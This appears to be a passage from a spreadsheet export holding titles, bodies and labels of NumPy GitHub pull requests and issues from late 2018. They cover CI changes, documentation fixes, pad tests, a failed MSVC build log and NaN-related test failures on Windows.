that when python3.7 turned out to be my new python3 after upgrading_x000D_
fedora._x000D_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</si>
  <si>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MAINT: Make `PYVER = 3` in doc/Makefile.</t>
  </si>
  <si>
    <t>Fixes #12483 by updating the docstring tests in matmul. Also tweak the exception message for other doctests</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>only a fraction of code has avx variants so the size must not be_x000D_
overriden globally._x000D_
Closes gh-12507</t>
  </si>
  <si>
    <t>BUG: only override vector size for avx code for 1.16</t>
  </si>
  <si>
    <t>only a fraction of code has avx variants so the size must not be_x000D_
overriden globally._x000D_
Closes gh-12507_x000D_
_x000D_
imo this still needs to be rewritten to have less duplication but this is the quick fix.</t>
  </si>
  <si>
    <t>BUG: only override vector size for avx code</t>
  </si>
  <si>
    <t>Split from #11358._x000D_
_x000D_
These tests describe not yet implemented behavior for the pad function:_x000D_
- pad should raise a explicit error if the "mode" argument is not_x000D_
  supported._x000D_
- pad should preserve the memory-layout (C/F order) of its input when_x000D_
  padding._x000D_
_x000D_
The test coverage is actually at 100%. Coverage.py says that [line 1292](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/arraypad.py#L1289) is not covered which is actually covered by [this test](https://github.com/numpy/numpy/blob/e26c2990c4828d6f7f2f588d75cd01eecafd53f3/numpy/lib/tests/test_arraypad.py#L792). One can check this with a debugger or by inserting the line `print(pad_before &gt; 0 or pad_after &gt; 0)` before the `continue` statement which is printed and actually corrects coverage.py's output. I believe this may be a bug with coverage.py or am I not noticing something obvious?_x000D_
_x000D_
Coverage for the rewrite in #11358 is nearly at 100 % too but I still want to cover a few only partially reached lines. Therefore this is still marked as WIP.</t>
  </si>
  <si>
    <t>WIP: TST: Add xfailing tests for rewrite of numpy.pad</t>
  </si>
  <si>
    <t>['05 - Testing', '25 - WIP', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Split from #11358. Makes sure that use cases out of cache are forced and the same data type (np.float64) is always used._x000D_
_x000D_
I'm undecided whether I should add a larger `pad_width` to the parameter matrix to represent more real world use cases. Is there a recommendation on how taxing (in this case memory-wise) benchmarks ought to be? Should the allocation of arrays be larger than e.g. 200 MiB be avoided?_x000D_
_x000D_
If someone remembers examples with large arrays from their work that would be a great reference point!</t>
  </si>
  <si>
    <t>BENCH: Improve benchmarks for numpy.pad</t>
  </si>
  <si>
    <t>We have been observing far too many false positive project-level codecov failures due to &lt; 0.01 % drops that are clearly not relevant. I've tried to adjust project `threshold` parameter [based on the standard docs](https://docs.codecov.io/docs/commit-status#section-threshold)._x000D_
_x000D_
This would allow a 0.05 % drop in total project test coverage to report as a success, but I think this is probably fine since a PR will still fail if its diff has poor coverage (there's a separate `threshold` we could set for the diff--currently I think it is set to our base coverage of around 85 % by default, which is fairly solid on a PR)._x000D_
_x000D_
I know this is something that came up recently with @shoyer in an in person discussion._x000D_
_x000D_
I'm not always optimistic about codecov doing exactly what the `yml` should be telling it to do, but maybe worth a try.</t>
  </si>
  <si>
    <t>TST: relax codecov project threshold</t>
  </si>
  <si>
    <t xml:space="preserve">Cast the covariance in the multivariate normal to double_x000D_
so that the interpretation of tol is cleaner._x000D_
_x000D_
closes #10839_x000D_
</t>
  </si>
  <si>
    <t>Update our 32-bit Linux Azure CI job to use the pre-built openblas binary currently used for our 32-bit linux wheel builds, to reduce dissonance between dev &amp; wheels CI runs. gfortran should also be a closer version match now._x000D_
_x000D_
For more details see my [related effort in SciPy](https://github.com/scipy/scipy/pull/9592)._x000D_
_x000D_
We'll be able to take this a step farther and audit the version of openblas used to build NumPy post-mortem when #12523 is merged, for assurance that Ubuntu system openblas doesn't get accidentally linked, etc.</t>
  </si>
  <si>
    <t>TST: wheel-match Linux openblas in CI</t>
  </si>
  <si>
    <t>We now have an [Azure job](https://dev.azure.com/numpy/numpy/_build/results?buildId=1222) to test linux 32 bit, let's remove the job it replaces from travis</t>
  </si>
  <si>
    <t>DEV: remove travis 32 bit job since it is running on azure</t>
  </si>
  <si>
    <t>* given the recent removal of Python 2.7_x000D_
support / testing in master, we no longer need the step_x000D_
to install VC 9.0 in Azure Windows CI</t>
  </si>
  <si>
    <t>MAINT: remove VC 9.0 from CI</t>
  </si>
  <si>
    <t>Stumbled upon this *NumPy for Matlab users* guide. Even though it says *Note: this is just an example, not a statement of "best practices"* I think it would still be better to use `np` instead of `num`, as this is the most common abbreviation you'll find in examples etc.</t>
  </si>
  <si>
    <t>DOC: Change 'num' to 'np'</t>
  </si>
  <si>
    <t>Fixes #12530 where having build artifacts on different drives prevents use of `os.path.relpath`</t>
  </si>
  <si>
    <t>DEV: use abspath on windows</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>`Ellipsis` expands to make the selection tuple be consistent with the_x000D_
number of dimensions of the array being indexed. `newaxis` objects are_x000D_
not included because they do not correspond to axes in the array being_x000D_
indexed. This commit fixes the docs to clarify that `newaxis` objects_x000D_
are not included when expanding `Ellipsis`._x000D_
_x000D_
For example,_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; x = np.zeros((3, 3, 3))_x000D_
&gt;&gt;&gt; x[:, ..., :2, np.newaxis].shape_x000D_
(3, 3, 2, 1)_x000D_
&gt;&gt;&gt; x[:, :, :2, np.newaxis].shape_x000D_
(3, 3, 2, 1)_x000D_
```_x000D_
_x000D_
The `Ellipsis` expands to a single `:` so that the selection tuple can_x000D_
index the 3-D array. The length of the expanded selection tuple is 4,_x000D_
not 3 as the docs indicated before this commit._x000D_
_x000D_
Edit: I'm not sure what the deal is with the coverage CI failure. I haven't changed any code; I've just fixed the docs. Coverage CI appears to be broken for other recent PRs too.</t>
  </si>
  <si>
    <t>DOC: Fix desc. of Ellipsis behavior in reference</t>
  </si>
  <si>
    <t>Building numpy from source in maintenance 1.16 and master fail to build on my system (Windows 10 1809, Python 3.7.1 64-bit, Visual Studio CE 2017, no site.cfg). Previous versions of numpy build without problems. Looks like quotes around paths containing spaces are missing:_x000D_
_x000D_
```_x000D_
&gt;py -3.7-64 setup.py bdist_wheel_x000D_
Running from numpy source directory._x000D_
Cythonizing sources_x000D_
Processing numpy/random\mtrand\randint_helpers.pxi.in_x000D_
Processing numpy/random\mtrand\mtrand.pyx_x000D_
blas_opt_info:_x000D_
blas_mkl_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries mkl_rt not found in ['X:\\Python37\\lib', 'C:\\', 'X:\\Python37\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
&lt;snip&gt;_x000D_
_x000D_
building library "npymath" sources_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\bin\HostX86\x64\cl.exe /c /nologo /Ox /W3 /GL /DNDEBUG  /MD -Inumpy\core\src\common -Inumpy\core\src -Inumpy\core -Inumpy\core\src\npymath -Inumpy\core\src\multiarray -Inumpy\core\src\umath -Inumpy\core\src\npysort -IX:\Python37\include -IX:\Python37\include -IC:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\ATLMFC\include -IC:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\include -IC:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\ucrt -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\shared -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\um -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\winrt -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\cppwinrt -IC:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE -IC:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\ucrt -IC:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\shared -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\um -IC:\Program Files (x86)\Windows Kits\10\include\10.0.15063.0\winrt /Tc_configtest.c /Fo_configtest.obj_x000D_
cl : Command line warning D9024 : unrecognized source file type '', object file assumed_x000D_
cl : Command line warning D9027 : source file '' ignored_x000D_
C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\bin\HostX86\x64\link.exe /nologo /INCREMENTAL:NO /LTCG  /MANIFEST:EMBED,ID=1 /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\ATLMFC\lib\x64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.14.26428\lib\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.15063.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.15063.0\um\x64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\LIB\amd64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.15063.0\ucrt\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\lib\um\x64" /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\lib\10.0.15063.0\um\x64" _configtest.obj /OUT:_configtest.exe_x000D_
LINK : fatal error LNK1181: cannot open input file '.obj'_x000D_
failure._x000D_
removing: _configtest.c _configtest.obj _configtest.obj.d_x000D_
Traceback (most recent call last):_x000D_
  File "setup.py", line 411, in &lt;module&gt;_x000D_
    setup_package()_x000D_
  File "setup.py", line 403, in setup_package_x000D_
    setup(**metadata)_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\core.py", line 171, in setup_x000D_
    return old_setup(**new_attr)_x000D_
  File "X:\Python37\lib\site-packages\setuptools\__init__.py", line 143, in setup_x000D_
    return distutils.core.setup(**attrs)_x000D_
  File "X:\Python37\lib\distutils\core.py", line 148, in setup_x000D_
    dist.run_commands()_x000D_
  File "X:\Python37\lib\distutils\dist.py", line 966, in run_commands_x000D_
    self.run_command(cmd)_x000D_
  File "X:\Python37\lib\distutils\dist.py", line 985, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "X:\Python37\lib\site-packages\wheel\bdist_wheel.py", line 188, in run_x000D_
    self.run_command('build')_x000D_
  File "X:\Python37\lib\distutils\cmd.py", line 313, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "X:\Python37\lib\distutils\dist.py", line 985, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\command\build.py", line 47, in run_x000D_
    old_build.run(self)_x000D_
  File "X:\Python37\lib\distutils\command\build.py", line 135, in run_x000D_
    self.run_command(cmd_name)_x000D_
  File "X:\Python37\lib\distutils\cmd.py", line 313, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "X:\Python37\lib\distutils\dist.py", line 985, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\command\build_src.py", line 148, in run_x000D_
    self.build_sources()_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\command\build_src.py", line 159, in build_sources_x000D_
    self.build_library_sources(*libname_info)_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\command\build_src.py", line 292, in build_library_sources_x000D_
    sources = self.generate_sources(sources, (lib_name, build_info))_x000D_
  File "D:\Build\numpy\numpy-git\numpy\distutils\command\build_src.py", line 375, in generate_sources_x000D_
    source = func(extension, build_dir)_x000D_
  File "numpy\core\setup.py", line 667, in get_mathlib_info_x000D_
    raise RuntimeError("Broken toolchain: cannot link a simple C program")_x000D_
RuntimeError: Broken toolchain: cannot link a simple C program_x000D_
```</t>
  </si>
  <si>
    <t>Unable to build numpy 1.16 and master with msvc</t>
  </si>
  <si>
    <t>When running `ctags -R`, the resulting tags file ignores `*.c.src` files. Adding this option file should make ctags include the files._x000D_
_x000D_
TBD: getting ctags to understand `MyPyLong_As@Type@ (PyObject *obj)`, curently it is parsed as `Type(PyObject *obj)`</t>
  </si>
  <si>
    <t>DEV: add ctags option file</t>
  </si>
  <si>
    <t>['16 - Development']</t>
  </si>
  <si>
    <t>@charris [noted Azure Windows warnings](https://github.com/numpy/numpy/pull/12498#issuecomment-445063962). In PR CI runs there are two types of such Warnings on Azure Windows jobs: 1 warning related to complete blocking of the publication of the test results, and the other about lacking build info._x000D_
_x000D_
This PR should fix 1 of those warning categories, and a reviewer should be able to navigate to the Azure page and confirm that this PR was 1 warning per Windows publish event vs. 2 warnings per Windows publish event on other recent PRs. The remaining warning is related to build data as discussed in #12530, and I'll likely handle that separately._x000D_
_x000D_
A reviewer should also be able to confirm that the test tab on Azure summary page for PR CI runs include &gt; 50,000 tests vs. only about 14,000 tests (Linux + Mac only) on recent PR CI runs. Runs after merging to master were less problematic--they are only missing the build info for Windows, so 1 warning only there already._x000D_
_x000D_
The idea behind the fix is simply to be more explicit about the path used for generating &amp; searching for junit xml test files on Windows jobs. Paths just work out better for Posix images, for now anyway, so no special treatment needed for them.</t>
  </si>
  <si>
    <t>WIP, TST: fix 1 Azure Windows warning</t>
  </si>
  <si>
    <t>['05 - Testing', '25 - WIP', '57 - Close?']</t>
  </si>
  <si>
    <t>Based on [comment suggesting](https://github.com/numpy/numpy/issues/12520#issuecomment-445587353) we do this to reproduce the test failures reported in #12520._x000D_
_x000D_
Of course, what this currently does is fail other tests for reasons I don't fully understand, instead of reproducing the desired failures._x000D_
_x000D_
If past experience is any guide, getting the CI run to work just right for this older compiler set without pre-installed Python 3.5 on the image could be more challenging than fixing the bug itself, but may be worth it to prevent regressions, etc._x000D_
_x000D_
Some paths / library paths may still need adjusting given the "manual" install of Python vs. the pre-loaded cases in our newer-compiler matrix for Windows.</t>
  </si>
  <si>
    <t>TST: add MSVC 2015 / Python 3.5 to CI</t>
  </si>
  <si>
    <t>['05 - Testing', '26 - Compiler']</t>
  </si>
  <si>
    <t>As reported on https://discuss.lgtm.com/t/analysis-fails-something-about-python3-5/1606, integration with lgtm.com C/C++ analysis is currently broken. This PR attempts to fix it by invoking Python 3 where the lgtm.com autobuild system would invoke Python 2 by default.</t>
  </si>
  <si>
    <t>DEV: Fix lgtm.com C/C++ build</t>
  </si>
  <si>
    <t>In running tests on PyPy, there were failures due to improper use of the C-API:_x000D_
- Calling `InitOperators` to initialize the generated `ufuncs` before calling `PyType_Ready(PyUFunc_Type)`_x000D_
- Using the `PySequence_Fast*` functions before calling [`PySequence_Fast`](https://docs.python.org/3.6/c-api/sequence.html#c.PySequence_Fast) which works on CPython but does not always work on PyPy_x000D_
_x000D_
We could prevent these mistakes by getting PyPy into our CI testing, but there are still test failures due to _x000D_
- insufficient ctypes and memoryview support in PyPy_x000D_
- late writing docstrings into types and objects via `_multiarray_umath.add_docstring`</t>
  </si>
  <si>
    <t>BUG: fix improper use of C-API</t>
  </si>
  <si>
    <t>**Background**: The process of building wheels for different platforms can be a little hard to follow sometimes, and even inspecting a NumPy wheel to determine which version of `openblas` it has been linked against can be highly non-trivial. This very recently lead to the upstream merge [of a PR that adds a version number](https://github.com/xianyi/OpenBLAS/pull/1890) to an extension function in `openblas`. _x000D_
_x000D_
While we may eventually want to try to convince the `openblas` team to go a step farther and add the git commit hash for further clarity, we should be able to leverage the version string as a first pass verification &amp; to provide the base infrastructure for runtime openblas version information inspection._x000D_
_x000D_
**Questions / Thoughts**:_x000D_
1. we may want to provide direct access to the version information in `numpy.distutils.system_info.get_info('openblas')` which currently generates_x000D_
a dictionary that might be expanded with a few new keys like this?_x000D_
```python_x000D_
{'libraries': ['openblas', 'openblas'], _x000D_
'library_dirs': ['/usr/lib'],_x000D_
'language': 'c', _x000D_
'define_macros': [('HAVE_CBLAS', None)]_x000D_
'version': '0.3.5dev', # should we add this?_x000D_
'hash': something, # maybe some day?_x000D_
}_x000D_
```_x000D_
_x000D_
2. We'd need a graceful way to handle the complete absence of openblas, and versions of openblas prior to the `0.3.4` release where the build info string does not include the version number. Basically, something flexible like the dictionary above is probably ok I guess._x000D_
_x000D_
3. In all likelihood the WIP code here is in the wrong files / paths -- should it all be diverted to distutils?_x000D_
_x000D_
4. Do people want to be able to access the openblas version number in C-level code? I.e., make code path decisions in C based on openblas version? I suspect this would get ugly pretty fast given that we are not exclusive to supporting an openblas backend, but better to ask this now than to need it later &amp; have diverging methods to inspect the openblas version info._x000D_
_x000D_
5. My current primary envisioned use case is quite simple -- in our development CI we have a variable i.e., OPENBLAS_VERSION -- this will pull in the appropriate wheel build URL, and then after we install NumPy from the assembled wheel we do a runtime sanity check that we have the correct linking (no interference from CI system changes, and provide absolute check / feedback to avoid sifting through complexities on MacPython wheels, etc. -- eventually perhaps upstreaming the check to post-mortem on wheels before they upload).</t>
  </si>
  <si>
    <t>WIP, ENH: add openblas runtime version inspection</t>
  </si>
  <si>
    <t>['01 - Enhancement', '25 - WIP']</t>
  </si>
  <si>
    <t>On my windows 10 machine, I get a lot of NaN-based failures, with:_x000D_
_x000D_
* Python: `3.5.4 (v3.5.4:3f56838, Aug  8 2017, 02:17:05) [MSC v.1900 64 bit (AMD64)]`_x000D_
* Numpy: a clean checkout of f07a38da97a6a36eb12b203f6c1ffa4bf2b2cb87_x000D_
_x000D_
_x000D_
&lt;details&gt;_x000D_
&lt;summary&gt;Build logs&lt;/summary&gt;_x000D_
_x000D_
```_x000D_
================================== FAILURES ===================================_x000D_
_________________________ TestMaximum.test_float_nans __________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestMaximum object at 0x000001EE0505FF28&gt;_x000D_
_x000D_
    def test_float_nans(self):_x000D_
        nan = np.nan_x000D_
        arg1 = np.array([0,   nan, nan])_x000D_
        arg2 = np.array([nan, 0,   nan])_x000D_
        out = np.array([nan, nan, nan])_x000D_
&gt;       assert_equal(np.maximum(arg1, arg2), out)_x000D_
_x000D_
arg1       = array([ 0., nan, nan])_x000D_
arg2       = array([nan,  0., nan])_x000D_
nan        = nan_x000D_
out        = array([nan, nan, nan])_x000D_
self       = &lt;numpy.core.tests.test_umath.TestMaximum object at 0x000001EE0505FF28&gt;_x000D_
_x000D_
numpy\core\tests\test_umath.py:908:_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
x = array([ 0., nan, nan]), y = array([nan, nan, nan]), func = &lt;ufunc 'isnan'&gt;_x000D_
hasval = 'nan'_x000D_
_x000D_
    def func_assert_same_pos(x, y, func=isnan, hasval='nan'):_x000D_
        """Handling nan/inf._x000D_
_x000D_
            Combine results of running func on x and y, checking that they are True_x000D_
            at the same locations._x000D_
_x000D_
            """_x000D_
        x_id = func(x)_x000D_
        y_id = func(y)_x000D_
        # We include work-arounds here to handle three types of slightly_x000D_
        # pathological ndarray subclasses:_x000D_
        # (1) all() on `masked` array scalars can return masked arrays, so we_x000D_
        #     use != True_x000D_
        # (2) __eq__ on some ndarray subclasses returns Python booleans_x000D_
        #     instead of element-wise comparisons, so we cast to bool_() and_x000D_
        #     use isinstance(..., bool) checks_x000D_
        # (3) subclasses with bare-bones __array_function__ implemenations may_x000D_
        #     not implement np.all(), so favor using the .all() method_x000D_
        # We are not committed to supporting such subclasses, but it's nice to_x000D_
        # support them if possible._x000D_
        if bool_(x_id == y_id).all() != True:_x000D_
            msg = build_err_msg([x, y],_x000D_
                                err_msg + '\nx and y %s location mismatch:'_x000D_
                                % (hasval), verbose=verbose, header=header,_x000D_
                                names=('x', 'y'), precision=precision)_x000D_
&gt;           raise AssertionError(msg)_x000D_
E           AssertionError:_x000D_
E           Arrays are not equal_x000D_
E_x000D_
E           x and y nan location mismatch:_x000D_
E            x: array([ 0., nan, nan])_x000D_
E            y: array([nan, nan, nan])_x000D_
_x000D_
bool_      = &lt;class 'numpy.bool_'&gt;_x000D_
err_msg    = ''_x000D_
func       = &lt;ufunc 'isnan'&gt;_x000D_
hasval     = 'nan'_x000D_
header     = 'Arrays are not equal'_x000D_
msg        = '\nArrays are not equal\n\nx and y nan location mismatch:\n x: array([ 0., nan, nan])\n y: array([nan, nan, nan])'_x000D_
precision  = 6_x000D_
verbose    = True_x000D_
x          = array([ 0., nan, nan])_x000D_
x_id       = array([False,  True,  True])_x000D_
y          = array([nan, nan, nan])_x000D_
y_id       = array([ True,  True,  True])_x000D_
_x000D_
numpy\testing\_private\utils.py:728: AssertionError_x000D_
_________________________ TestMinimum.test_float_nans __________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestMinimum object at 0x000001EE050434A8&gt;_x000D_
_x000D_
    def test_float_nans(self):_x000D_
        nan = np.nan_x000D_
        arg1 = np.array([0,   nan, nan])_x000D_
        arg2 = np.array([nan, 0,   nan])_x000D_
        out = np.array([nan, nan, nan])_x000D_
&gt;       assert_equal(np.minimum(arg1, arg2), out)_x000D_
_x000D_
arg1       = array([ 0., nan, nan])_x000D_
arg2       = array([nan,  0., nan])_x000D_
nan        = nan_x000D_
out        = array([nan, nan, nan])_x000D_
self       = &lt;numpy.core.tests.test_umath.TestMinimum object at 0x000001EE050434A8&gt;_x000D_
_x000D_
numpy\core\tests\test_umath.py:966:_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
x = array([ 0., nan, nan]), y = array([nan, nan, nan]), func = &lt;ufunc 'isnan'&gt;_x000D_
hasval = 'nan'_x000D_
_x000D_
    def func_assert_same_pos(x, y, func=isnan, hasval='nan'):_x000D_
        """Handling nan/inf._x000D_
_x000D_
            Combine results of running func on x and y, checking that they are True_x000D_
            at the same locations._x000D_
_x000D_
            """_x000D_
        x_id = func(x)_x000D_
        y_id = func(y)_x000D_
        # We include work-arounds here to handle three types of slightly_x000D_
        # pathological ndarray subclasses:_x000D_
        # (1) all() on `masked` array scalars can return masked arrays, so we_x000D_
        #     use != True_x000D_
        # (2) __eq__ on some ndarray subclasses returns Python booleans_x000D_
        #     instead of element-wise comparisons, so we cast to bool_() and_x000D_
        #     use isinstance(..., bool) checks_x000D_
        # (3) subclasses with bare-bones __array_function__ implemenations may_x000D_
        #     not implement np.all(), so favor using the .all() method_x000D_
        # We are not committed to supporting such subclasses, but it's nice to_x000D_
        # support them if possible._x000D_
        if bool_(x_id == y_id).all() != True:_x000D_
            msg = build_err_msg([x, y],_x000D_
                                err_msg + '\nx and y %s location mismatch:'_x000D_
                                % (hasval), verbose=verbose, header=header,_x000D_
                                names=('x', 'y'), precision=precision)_x000D_
&gt;           raise AssertionError(msg)_x000D_
E           AssertionError:_x000D_
E           Arrays are not equal_x000D_
E_x000D_
E           x and y nan location mismatch:_x000D_
E            x: array([ 0., nan, nan])_x000D_
E            y: array([nan, nan, nan])_x000D_
_x000D_
bool_      = &lt;class 'numpy.bool_'&gt;_x000D_
err_msg    = ''_x000D_
func       = &lt;ufunc 'isnan'&gt;_x000D_
hasval     = 'nan'_x000D_
header     = 'Arrays are not equal'_x000D_
msg        = '\nArrays are not equal\n\nx and y nan location mismatch:\n x: array([ 0., nan, nan])\n y: array([nan, nan, nan])'_x000D_
precision  = 6_x000D_
verbose    = True_x000D_
x          = array([ 0., nan, nan])_x000D_
x_id       = array([False,  True,  True])_x000D_
y          = array([nan, nan, nan])_x000D_
y_id       = array([ True,  True,  True])_x000D_
_x000D_
numpy\testing\_private\utils.py:728: AssertionError_x000D_
____________________________ TestFmax.test_reduce ______________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestFmax object at 0x000001EE01EC3780&gt;_x000D_
_x000D_
    def test_reduce(self):_x000D_
        dflt = np.typecodes['AllFloat']_x000D_
        dint = np.typecodes['AllInteger']_x000D_
        seq1 = np.arange(11)_x000D_
        seq2 = seq1[::-1]_x000D_
        func = np.fmax.reduce_x000D_
        for dt in dint:_x000D_
            tmp1 = seq1.astype(dt)_x000D_
            tmp2 = seq2.astype(dt)_x000D_
            assert_equal(func(tmp1), 10)_x000D_
            assert_equal(func(tmp2), 10)_x000D_
        for dt in dflt:_x000D_
            tmp1 = seq1.astype(dt)_x000D_
            tmp2 = seq2.astype(dt)_x000D_
            assert_equal(func(tmp1), 10)_x000D_
            assert_equal(func(tmp2), 10)_x000D_
            tmp1[::2] = np.nan_x000D_
            tmp2[::2] = np.nan_x000D_
&gt;           assert_equal(func(tmp1), 9)_x000D_
E           AssertionError:_x000D_
E           Items are not equal:_x000D_
E            ACTUAL: nan_x000D_
E            DESIRED: 9_x000D_
_x000D_
dflt       = 'efdgFDG'_x000D_
dint       = 'bBhHiIlLqQpP'_x000D_
dt         = 'f'_x000D_
func       = &lt;built-in method reduce of numpy.ufunc object at 0x000001EE76ADBB40&gt;_x000D_
self       = &lt;numpy.core.tests.test_umath.TestFmax object at 0x000001EE01EC3780&gt;_x000D_
seq1       = array([ 0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10])_x000D_
seq2       = array([10,  9,  8,  7,  6,  5,  4,  3,  2,  1,  0])_x000D_
tmp1       = array([nan,  1., nan,  3., nan,  5., nan,  7., nan,  9., nan],_x000D_
      dtype=float32)_x000D_
tmp2       = array([nan,  9., nan,  7., nan,  5., nan,  3., nan,  1., nan],_x000D_
      dtype=float32)_x000D_
_x000D_
numpy\core\tests\test_umath.py:1012: AssertionError_x000D_
____________________________ TestFmin.test_reduce ______________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestFmin object at 0x000001EE01ECAB38&gt;_x000D_
_x000D_
    def test_reduce(self):_x000D_
        dflt = np.typecodes['AllFloat']_x000D_
        dint = np.typecodes['AllInteger']_x000D_
        seq1 = np.arange(11)_x000D_
        seq2 = seq1[::-1]_x000D_
        func = np.fmin.reduce_x000D_
        for dt in dint:_x000D_
            tmp1 = seq1.astype(dt)_x000D_
            tmp2 = seq2.astype(dt)_x000D_
            assert_equal(func(tmp1), 0)_x000D_
            assert_equal(func(tmp2), 0)_x000D_
        for dt in dflt:_x000D_
            tmp1 = seq1.astype(dt)_x000D_
            tmp2 = seq2.astype(dt)_x000D_
            assert_equal(func(tmp1), 0)_x000D_
            assert_equal(func(tmp2), 0)_x000D_
            tmp1[::2] = np.nan_x000D_
            tmp2[::2] = np.nan_x000D_
&gt;           assert_equal(func(tmp1), 1)_x000D_
E           AssertionError:_x000D_
E           Items are not equal:_x000D_
E            ACTUAL: nan_x000D_
E            DESIRED: 1_x000D_
_x000D_
dflt       = 'efdgFDG'_x000D_
dint       = 'bBhHiIlLqQpP'_x000D_
dt         = 'f'_x000D_
func       = &lt;built-in method reduce of numpy.ufunc object at 0x000001EE76ADBD00&gt;_x000D_
self       = &lt;numpy.core.tests.test_umath.TestFmin object at 0x000001EE01ECAB38&gt;_x000D_
seq1       = array([ 0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10])_x000D_
seq2       = array([10,  9,  8,  7,  6,  5,  4,  3,  2,  1,  0])_x000D_
tmp1       = array([nan,  1., nan,  3., nan,  5., nan,  7., nan,  9., nan],_x000D_
      dtype=float32)_x000D_
tmp2       = array([nan,  9., nan,  7., nan,  5., nan,  3., nan,  1., nan],_x000D_
      dtype=float32)_x000D_
_x000D_
numpy\core\tests\test_umath.py:1054: AssertionError_x000D_
_______________________ TestMinMax.test_minmax_blocked _________________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestMinMax object at 0x000001EE053C8048&gt;_x000D_
_x000D_
    def test_minmax_blocked(self):_x000D_
        # simd tests on max/min, test all alignments, slow but important_x000D_
        # for 2 * vz + 2 * (vs - 1) + 1 (unrolled once)_x000D_
        for dt, sz in [(np.float32, 15), (np.float64, 7)]:_x000D_
            for out, inp, msg in _gen_alignment_data(dtype=dt, type='unary',_x000D_
                                                     max_size=sz):_x000D_
                for i in range(inp.size):_x000D_
                    inp[:] = np.arange(inp.size, dtype=dt)_x000D_
                    inp[i] = np.nan_x000D_
                    emsg = lambda: '%r\n%s' % (inp, msg)_x000D_
                    with suppress_warnings() as sup:_x000D_
                        sup.filter(RuntimeWarning,_x000D_
                                   "invalid value encountered in reduce")_x000D_
&gt;                       assert_(np.isnan(inp.max()), msg=emsg)_x000D_
E                       AssertionError: array([ 0., nan], dtype=float32)_x000D_
E                       unary offset=(0, 0), size=2, dtype=&lt;class 'numpy.float32'&gt;, out of place_x000D_
_x000D_
dt         = &lt;class 'numpy.float32'&gt;_x000D_
emsg       = &lt;function TestMinMax.test_minmax_blocked.&lt;locals&gt;.&lt;lambda&gt; at 0x000001EE041E9730&gt;_x000D_
i          = 1_x000D_
inp        = array([ 0., nan], dtype=float32)_x000D_
msg        = "unary offset=(0, 0), size=2, dtype=&lt;class 'numpy.float32'&gt;, out of place"_x000D_
out        = array([ 0., nan], dtype=float32)_x000D_
self       = &lt;numpy.core.tests.test_umath.TestMinMax object at 0x000001EE053C8048&gt;_x000D_
sup        = &lt;numpy.testing._private.utils.suppress_warnings object at 0x000001EE053C82B0&gt;_x000D_
sz         = 15_x000D_
_x000D_
numpy\core\tests\test_umath.py:1319: AssertionError_x000D_
